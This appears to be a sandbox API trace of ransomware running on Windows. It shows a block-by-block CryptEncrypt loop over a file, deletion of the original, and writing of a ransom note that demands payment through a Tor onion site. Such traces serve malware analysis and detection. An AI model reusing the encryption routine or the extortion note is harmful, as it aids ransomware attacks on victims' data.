[0159.274] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.274] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.274] GetLastError () returned 0x0 [0159.274] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.274] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.274] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.274] GetLastError () returned 0x0 [0159.274] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.274] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.274] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.274] GetLastError () returned 0x0 [0159.274] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.274] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.274] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.274] GetLastError () returned 0x0 [0159.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.275] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.275] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.275] GetLastError () returned 0x0 [0159.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.275] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.275] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.275] GetLastError () returned 0x0 [0159.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.275] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.275] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.275] GetLastError () returned 0x0 [0159.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.275] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.275] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.275] GetLastError () returned 0x0 [0159.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.275] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.275] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.275] GetLastError () returned 0x0 [0159.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.275] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.276] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.276] GetLastError () returned 0x0 [0159.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.276] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.276] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.276] GetLastError () returned 0x0 [0159.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.276] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.276] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.276] GetLastError () returned 0x0 [0159.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.276] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.276] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.276] GetLastError () returned 0x0 [0159.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.276] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.276] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.276] GetLastError () returned 0x0 [0159.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.276] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.276] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.276] GetLastError () returned 0x0 [0159.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.276] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.276] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.277] GetLastError () returned 0x0 [0159.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.277] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.277] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.277] GetLastError () returned 0x0 [0159.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.277] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.277] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.277] GetLastError () returned 0x0 [0159.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.277] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.277] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.277] GetLastError () returned 0x0 [0159.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.277] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.277] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.277] GetLastError () returned 0x0 [0159.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.277] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.277] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.277] GetLastError () returned 0x0 [0159.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.277] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.277] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.277] GetLastError () returned 0x0 [0159.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.278] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.278] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.278] GetLastError () returned 0x0 [0159.278] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.278] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.278] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.278] GetLastError () returned 0x0 [0159.278] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.278] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.278] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0159.278] GetLastError () returned 0x0 [0159.278] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0159.278] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0159.278] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0159.278] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\tipresx.dll.mui")) returned 0x20 [0159.278] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0159.279] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui") returned 1 [0159.279] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\tipresx.dll.mui")) returned 0 [0159.279] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui" [0159.279] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT") returned 1 [0159.279] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\.xXE174.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\.xxe174.tmp")) returned 0xe174 [0159.286] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\.xXE174.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\.xxe174.tmp"), dwFlags=0x1) returned 0 [0159.287] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\.xXE174.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\.xxe174.tmp")) returned 1 [0159.287] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0159.287] wcslen (_String="OK") returned 0x2 [0159.287] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.287] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.287] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0159.287] CryptDestroyHash (hHash=0x9ad838) returned 1 [0159.287] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0159.287] FindNextFileW (in: hFindFile=0x9ad338, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0159.287] GetLastError () returned 0x12 [0159.287] FindClose (in: hFindFile=0x9ad338 | out: hFindFile=0x9ad338) returned 1 [0159.287] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0159.288] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0159.288] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0159.288] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0159.288] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.288] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.288] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0159.288] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.288] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.288] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", pszSpec="*.exe") returned 0 [0159.288] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft 